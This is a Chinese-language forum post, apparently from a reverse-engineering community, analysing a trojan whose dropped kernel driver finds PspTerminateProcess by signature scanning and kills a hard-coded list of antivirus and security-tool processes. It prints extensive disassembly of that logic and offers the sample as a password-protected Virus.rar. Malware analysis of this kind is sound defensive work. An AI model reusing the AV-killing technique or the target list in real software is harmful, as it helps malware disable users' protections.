昨天发了一篇被判定为YJ贴了。。,希望这篇不会。。。
马比较简单,适合新手。
先说一下行为:exe文件会释放Pcix32.sys amd32_.sys atax32.sys三个文件,但是后两个其实只是地一个的拷贝。sys文件负责监控各种杀毒软件和安全工具的启动,一旦发现,马上kill。
1。exe行为。
这里只写思路,详细请参考idb文件和自己跟,嘎嘎。
首先获取系统drivers目录,然后释放Pcix32.sys到这个目录下,期间拷贝各种副本。
还有,exe会检测是否有还原精灵,有的话会做相应处理,不过本人太懒。。懒得搭环境,这部分有兴趣的跟一下吧:)
如果没有还原精灵的话,就加载驱动。
最后有一个注入的行为,也没仔细跟:D
2。sys
这个是感兴趣的,贴代码:

代码:
.text:00010B34                 lea     eax, [ebp+SystemInformation]
.text:00010B37                 push    eax             ; ReturnLength
.text:00010B38                 push    0               ; SystemInformationLength
.text:00010B3A                 push    eax             ; SystemInformation
.text:00010B3B                 push    0Bh             ; SystemInformationClass
.text:00010B3D                 mov     edi, ds:__imp_ZwQuerySystemInformation
.text:00010B43                 call    edi ; __imp_ZwQuerySystemInformation
.text:00010B45                 push    [ebp+SystemInformation] ; NumberOfBytes
.text:00010B48                 push    1               ; PoolType
.text:00010B4A                 call    ds:ExAllocatePool
获得系统各种信息。。。
代码:
text:00010B5A                 push    0               ; ReturnLength
.text:00010B5C                 push    [ebp+SystemInformation] ; SystemInformationLength
.text:00010B5F                 push    esi             ; SystemInformation
.text:00010B60                 push    0Bh             ; SystemInformationClass
.text:00010B62                 call    edi ; __imp_ZwQuerySystemInformation
.text:00010B64                 test    eax, eax
.text:00010B66                 jl      short loc_10BDE
.text:00010B68                 mov     ebx, [esi+0Ch]
.text:00010B6B                 mov     edi, [esi+10h]
.text:00010B6E                 add     edi, ebx
.text:00010B70                 push    0               ; Tag
.text:00010B72                 push    esi             ; P
.text:00010B73                 call    ds:ExFreePoolWithTag
.text:00010B79                 mov     esi, ebx
.text:00010B7B
.text:00010B7B loc_10B7B:                              ; CODE XREF: sub_10B28+BFj
.text:00010B7B                 cmp     esi, edi
.text:00010B7D                 ja      short loc_10BDE
.text:00010B7F                 push    esi             ; VirtualAddress
.text:00010B80                 call    ds:MmIsAddressValid
.text:00010B86                 test    al, al
.text:00010B88                 jz      short loc_10BE6
.text:00010B8A                 lea     ebx, [esi+4]
.text:00010B8D                 push    ebx             ; VirtualAddress
.text:00010B8E                 call    ds:MmIsAddressValid;测试地址是否可用,防止BSOD。。。
.text:00010B94                 test    al, al
.text:00010B96                 jz      short loc_10BE6
.text:00010B98                 mov     eax, 8B55FF8Bh:google一下这个值吧,发现是PspTerminateProcess
.text:00010B9D                 cmp     [esi], eax
.text:00010B9F                 jnz     short loc_10BE6
.text:00010BA1                 mov     eax, 0CEC83ECh
.text:00010BA6                 cmp     [ebx], eax
.text:00010BA8                 jnz     short loc_10BE6
.text:00010BAA                 mov     eax, 0FFF84D83h
.text:00010BAF                 cmp     [esi+8], eax
.text:00010BB2                 jnz     short loc_10BE6
.text:00010BB4                 mov     eax, 7D8B5756h
.text:00010BB9                 cmp     [esi+0Ch], eax
.text:00010BBC                 jnz     short loc_10BE6
.text:00010BBE                 and     [ebp+ms_exc.disabled], 0
.text:00010BC2                 mov     [ebp+var_20], esi
.text:00010BC5                 mov     [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010BCC                 mov     eax, esi;保存函数地址
作者考虑的还挺周全。。。如果木有找到这个函数:
代码:
.text:00010A40                 call    _GetPspTerminateProcessAddress
.text:00010A45                 mov     PspTerminateProcess, eax
.text:00010A4A                 test    eax, eax
.text:00010A4C                 jnz     short loc_10A8F
.text:00010A4E                 call    sub_10568
就去找PsTerminateProcess这个东东:
代码:
sub_10568       proc near               ; CODE XREF: sub_10A30+1Ep
.text:00010568                 push    offset aPsterminatesys ; "PsTerminateSystemThread"
.text:0001056D                 push    sysInfo
.text:00010573                 call    sub_10486
.text:00010578                 xor     ecx, ecx
.text:0001057A
.text:0001057A loc_1057A:                              ; CODE XREF: sub_10568+28j
.text:0001057A                 cmp     byte ptr [eax], 0FFh;0xFF7508,即psterminateprocess
.text:0001057D                 jnz     short loc_1058B
.text:0001057F                 cmp     byte ptr [eax+1], 75h
.text:00010583                 jnz     short loc_1058B
.text:00010585                 cmp     byte ptr [eax+2], 8
.text:00010589                 jz      short loc_10595
。。。。
.text:00010595 loc_10595:                              ; CODE XREF: sub_10568+21j
.text:00010595                 add     eax, 5
.text:00010598                 mov     ecx, [eax]
.text:0001059A                 lea     eax, [ecx+eax+4]
.text:0001059E                 retn
期间还有两个函数,时间仓促,没细看,就不说了。。。。
下面是find and kill函数,负责干坏事的元凶:
代码:
.text:00010CEC                 mov     edi, edi
.text:00010CEE                 push    ebp
.text:00010CEF                 mov     ebp, esp
.text:00010CF1                 sub     esp, 6A4h
.text:00010CF7                 and     [ebp+var_C], 0
.text:00010CFB                 push    ebx
.text:00010CFC                 push    esi
.text:00010CFD                 push    edi
.text:00010CFE                 mov     esi, 0FFFFh
.text:00010D03                 push    esi             ; NumberOfBytes
.text:00010D04                 mov     ebx, offset aKvmonxp_exe ; "KVMonXp.exe"
.text:00010D09                 push    1               ; PoolType
.text:00010D0B                 mov     [ebp+SourceString], offset aNod32krn_exe ; "nod32krn.exe"
.text:00010D15                 mov     [ebp+var_C0], offset aEgui_exe ; "egui.exe"
.text:00010D1F                 mov     [ebp+var_BC], offset aEkrn_exe ; "ekrn.exe"
.text:00010D29                 mov     [ebp+var_B8], offset a360tray_exe ; "360tray.exe"
.text:00010D33                 mov     [ebp+var_B4], offset a360safe_exe ; "360Safe.exe"
.text:00010D3D                 mov     [ebp+var_B0], offset aSafeboxtray_ex ; "safeboxTray.exe"
.text:00010D47                 mov     [ebp+var_AC], offset a360safebox_exe ; "360safebox.exe"
.text:00010D51                 mov     [ebp+var_A8], offset a360sd_exe ; "360sd.exe"
.text:00010D5B                 mov     [ebp+var_A4], offset aZhudongfangyu_ ; "ZhuDongFangYu.exe"
.text:00010D65                 mov     [ebp+var_A0], offset a360rp_exe ; "360rp.exe"
.text:00010D6F                 mov     [ebp+var_9C], offset a360sdupd_exe ; "360sdupd.exe"
.text:00010D79                 mov     [ebp+var_98], offset a360rps_exe ; "360rps.exe"
.text:00010D83                 mov     [ebp+var_94], offset a3_0 ; "3"
.text:00010D8D                 mov     [ebp+var_90], offset aO ; "O"
.text:00010D97                 mov     [ebp+var_8C], offset asc_11BDE ; "L"
.text:00010DA1                 mov     [ebp+var_88], offset aK_8 ; "K"
.text:00010DAB                 mov     [ebp+var_84], offset aK_7 ; "k"
.text:00010DB5                 mov     [ebp+var_80], offset aK_6 ; "k"
.text:00010DBC                 mov     [ebp+var_7C], offset aK_5 ; "k"
.text:00010DC3                 mov     [ebp+var_78], offset aK_4 ; "k"
.text:00010DCA                 mov     [ebp+var_74], offset aU ; "u"
.text:00010DD1                 mov     [ebp+var_70], offset aKxescore_exe ; "kxescore.exe"
.text:00010DD8                 mov     [ebp+var_6C], offset aKxetray_exe ; "kxetray.exe"
.text:00010DDF                 mov     [ebp+var_68], offset aK_3 ; "K"
.text:00010DE6                 mov     [ebp+var_64], offset aK ; "K"
.text:00010DED                 mov     [ebp+var_60], offset aGuiyingfix_exe ; "guiyingfix.exe"
.text:00010DF4                 mov     [ebp+var_5C], offset aRavmond_exe ; "RavMonD.exe"
.text:00010DFB                 mov     [ebp+var_58], offset aR_3 ; "R"
.text:00010E02                 mov     [ebp+var_54], offset aR ; "R"
.text:00010E09                 mov     [ebp+var_50], offset aRegguide_exe ; "RegGuide.exe"
.text:00010E10                 mov     [ebp+var_4C], offset aR_0 ; "R"
.text:00010E17                 mov     [ebp+var_48], offset aRscopy_exe ; "RsCopy.exe"
.text:00010E1E                 mov     [ebp+var_44], offset aRav_exe ; "Rav.exe"
.text:00010E25                 mov     [ebp+var_40], offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010E2C                 mov     [ebp+var_3C], offset word_119F2
.text:00010E33                 mov     [ebp+var_38], ebx
.text:00010E36                 mov     [ebp+var_34], offset aA ; "a"
.text:00010E3D                 mov     [ebp+var_30], offset aIcesword_exe ; "IceSword.exe"
.text:00010E44                 mov     [ebp+var_2C], offset aS_0 ; "S"
.text:00010E4B                 mov     [ebp+var_28], offset aR_1 ; "r"
.text:00010E52                 mov     [ebp+var_24], offset aKnownsvr_exe ; "knownsvr.exe"
.text:00010E59                 mov     [ebp+var_20], offset aR_2 ; "r"
.text:00010E60                 mov     [ebp+var_1C], offset aKnsdtray_exe ; "knsdtray.exe"
.text:00010E67                 mov     [ebp+var_18], offset aK_2 ; "k"
.text:00010E6E                 mov     [ebp+var_14], offset aK_1 ; "k"
.text:00010E75                 mov     [ebp+var_10], offset aK_0 ; "k"
.text:00010E7C                 call    ds:ExAllocatePool
.text:00010E82                 mov     edi, eax
.text:00010E84                 mov     [ebp+P], edi
.text:00010E87                 test    edi, edi
.text:00010E89                 jz      loc_10FA5
.text:00010E8F                 push    offset Format   ; "enter findprocessandkill\n"
.text:00010E94                 call    DbgPrint
.text:00010E99                 pop     ecx
.text:00010E9A                 lea     eax, [ebp+ReturnLength]
.text:00010E9D                 push    eax             ; ReturnLength
.text:00010E9E                 push    esi             ; SystemInformationLength
.text:00010E9F                 push    edi             ; SystemInformation
.text:00010EA0                 push    5               ; SystemInformationClass
.text:00010EA2                 call    ds:__imp_ZwQuerySystemInformation
.text:00010EA8                 mov     esi, edi
.text:00010EAA
.text:00010EAA loc_10EAA:                              ; CODE XREF: _FindAddKillProcess+2A8j
.text:00010EAA                 add     esi, [esi]
.text:00010EAC                 xor     eax, eax
.text:00010EAE                 lea     edi, [esi+38h]
.text:00010EB1                 cmp     [edi], ax
.text:00010EB4                 jz      loc_10F91
.text:00010EBA                 mov     [ebp+ReturnLength], eax
.text:00010EBD
.text:00010EBD loc_10EBD:                              ; CODE XREF: _FindAddKillProcess+29Fj
.text:00010EBD                 push    [ebp+eax*4+SourceString] ; SourceString
.text:00010EC4                 lea     eax, [ebp+eax*8+DestinationString]
.text:00010ECB                 push    eax             ; DestinationString
.text:00010ECC                 call    ds:RtlInitUnicodeString
.text:00010ED2                 mov     eax, [ebp+ReturnLength]
.text:00010ED5                 push    1               ; CaseInSensitive
.text:00010ED7                 lea     eax, [ebp+eax*8+DestinationString]
.text:00010EDE                 push    eax             ; String2
.text:00010EDF                 push    edi             ; String1
.text:00010EE0                 call    ds:RtlCompareUnicodeString
.text:00010EE6                 test    eax, eax
.text:00010EE8                 jnz     loc_10F7C
.text:00010EEE                 mov     eax, [ebp+ReturnLength]
.text:00010EF1                 push    offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010EF6                 push    [ebp+eax*4+SourceString] ; wchar_t *
.text:00010EFD                 call    ds:_wcsicmp
.text:00010F03                 pop     ecx
.text:00010F04                 pop     ecx
.text:00010F05                 test    eax, eax
.text:00010F07                 jz      short loc_10F75
.text:00010F09                 mov     eax, [ebp+ReturnLength]
.text:00010F0C                 push    offset word_119F2 ; wchar_t *
.text:00010F11                 push    [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F18                 call    ds:_wcsicmp
.text:00010F1E                 pop     ecx
.text:00010F1F                 pop     ecx
.text:00010F20                 test    eax, eax
.text:00010F22                 jz      short loc_10F75
.text:00010F24                 mov     eax, [ebp+ReturnLength]
.text:00010F27                 push    ebx             ; wchar_t *
.text:00010F28                 push    [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F2F                 call    ds:_wcsicmp
.text:00010F35                 pop     ecx
.text:00010F36                 pop     ecx
.text:00010F37                 test    eax, eax
.text:00010F39                 jz      short loc_10F75
.text:00010F3B                 mov     eax, [ebp+ReturnLength]
.text:00010F3E                 push    [ebp+eax*4+SourceString]
.text:00010F45                 push    offset aFindProcesssWs ; "Find Processs: %ws\n"
.text:00010F4A                 call    DbgPrint
.text:00010F4F                 pop     ecx
.text:00010F50                 pop     ecx
.text:00010F51                 push    dword ptr [esi+44h] ; PEPROCESS
.text:00010F54                 call    KillProcess
.text:00010F59                 test    eax, eax
.text:00010F5B                 jl      short loc_10F7C
.text:00010F5D                 mov     eax, [ebp+ReturnLength]
.text:00010F60                 push    [ebp+eax*4+SourceString]
.text:00010F67                 push    offset aKillProcesssWs ; "Kill Processs: %ws OK!\n"
.text:00010F6C                 call    DbgPrint
.text:00010F71                 pop     ecx
.text:00010F72                 pop     ecx
.text:00010F73                 jmp     short loc_10F7C
.text:00010F75 ; ---------------------------------------------------------------------------
.text:00010F75
.text:00010F75 loc_10F75:                              ; CODE XREF: _FindAddKillProcess+21Bj
.text:00010F75                                         ; _FindAddKillProcess+236j ...
.text:00010F75                 mov     byte_1212C, 1
.text:00010F7C
.text:00010F7C loc_10F7C:                              ; CODE XREF: _FindAddKillProcess+1FCj
.text:00010F7C                                         ; _FindAddKillProcess+26Fj ...
.text:00010F7C                 mov     eax, [ebp+ReturnLength]
.text:00010F7F                 inc     eax
.text:00010F80                 cmp     [ebp+eax*4+SourceString], 0
.text:00010F88                 mov     [ebp+ReturnLength], eax
.text:00010F8B                 jnz     loc_10EBD
.text:00010F91
.text:00010F91 loc_10F91:                              ; CODE XREF: _FindAddKillProcess+1C8j
.text:00010F91                 cmp     dword ptr [esi], 0
.text:00010F94                 jnz     loc_10EAA
.text:00010F9A                 push    0               ; Tag
.text:00010F9C                 push    [ebp+P]         ; P
.text:00010F9F                 call    ds:ExFreePoolWithTag
.text:00010FA5
.text:00010FA5 loc_10FA5:                              ; CODE XREF: _FindAddKillProcess+19Dj
.text:00010FA5                 pop     edi
.text:00010FA6                 pop     esi
.text:00010FA7                 pop     ebx
.text:00010FA8                 leave
.text:00010FA9                 retn
循环查找一堆安全工具,发现就kill~
呵呵,看一下怎么kill的吧:
代码:
KillProcess     proc near               ; CODE XREF: _FindAddKillProcess+268p
.text:00010CB0
.text:00010CB0 PEPROCESS       = dword ptr  8
.text:00010CB0
.text:00010CB0                 mov     edi, edi
.text:00010CB2                 push    ebp
.text:00010CB3                 mov     ebp, esp
.text:00010CB5                 lea     eax, [ebp+PEPROCESS]
.text:00010CB8                 push    eax
.text:00010CB9                 push    [ebp+PEPROCESS]
.text:00010CBC                 call    PsLookupProcessByProcessId
.text:00010CC1                 test    eax, eax
.text:00010CC3                 jl      short loc_10CCE
.text:00010CC5                 mov     ecx, [ebp+PEPROCESS] ; Object
.text:00010CC8                 call    ds:ObfDereferenceObject
.text:00010CCE
.text:00010CCE loc_10CCE:                              ; CODE XREF: KillProcess+13j
.text:00010CCE                 push    [ebp+PEPROCESS]
.text:00010CD1                 call    sub_10C4E
.text:00010CD6                 test    eax, eax
.text:00010CD8                 jl      short loc_10CDE
.text:00010CDA                 xor     eax, eax
.text:00010CDC                 jmp     short loc_10CE3
.text:00010CDE ; ---------------------------------------------------------------------------
.text:00010CDE
.text:00010CDE loc_10CDE:                              ; CODE XREF: KillProcess+28j
.text:00010CDE                 mov     eax, 0C0000001h
.text:00010CE3
.text:00010CE3 loc_10CE3:                              ; CODE XREF: KillProcess+2Cj
.text:00010CE3                 pop     ebp
.text:00010CE4                 retn    4
.text:00010CE4 KillProcess     endp
然后是00010CD1的调用:
代码:
                
.text:00010C50                 push    offset unk_12088
.text:00010C55                 call    __SEH_prolog4
.text:00010C5A                 xor     edi, edi
.text:00010C5C                 mov     [ebp+var_1C], edi
.text:00010C5F                 mov     [ebp+ms_exc.disabled], edi
.text:00010C62                 push    edi             ; Object
.text:00010C63
.text:00010C63 loc_10C63:                              ; CODE XREF: sub_10C4E+32j
.text:00010C63                 push    [ebp+PEPROCESS] ; PEPROCESS
.text:00010C66                 call    sub_10BEE
.text:00010C6B                 mov     esi, eax
.text:00010C6D                 cmp     esi, edi
.text:00010C6F                 jz      short loc_10C99
.text:00010C71                 mov     [ebp+var_1C], edi
.text:00010C74                 push    edi
.text:00010C75                 push    esi
.text:00010C76                 call    PspTerminateProcess
.text:00010C7C                 mov     [ebp+var_1C], eax
.text:00010C7F                 push    esi
.text:00010C80                 jmp     short loc_10C63
.text:00010C82 ; ---------------------------------------------------------------------------
.text:00010C82
.text:00010C82 loc_10C82:                              ; DATA XREF: .rdata:0001209Co
.text:00010C82                 mov     eax, [ebp+ms_exc.exc_ptr]
.text:00010C85                 mov     eax, [eax]
.text:00010C87                 mov     eax, [eax]
.text:00010C89                 mov     [ebp+var_20], eax
.text:00010C8C                 xor     eax, eax
.text:00010C8E                 inc     eax
.text:00010C8F                 retn
.text:00010C90 ; ---------------------------------------------------------------------------
.text:00010C90
.text:00010C90 loc_10C90:                              ; DATA XREF: .rdata:000120A0o
.text:00010C90                 mov     esp, [ebp+ms_exc.old_esp]
.text:00010C93                 mov     eax, [ebp+var_20]
.text:00010C96                 mov     [ebp+var_1C], eax
.text:00010C99
.text:00010C99 loc_10C99:                              ; CODE XREF: sub_10C4E+21j
.text:00010C99                 mov     [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010CA0                 mov     eax, [ebp+var_1C]
.text:00010CA3                 call    __SEH_epilog4
.text:00010CA8                 retn    4
.text:00010CA8 sub_10C4E       endp
先到这里吧。。写的有点简略,大家见谅。。。


解压密码:pediy
Virus.rar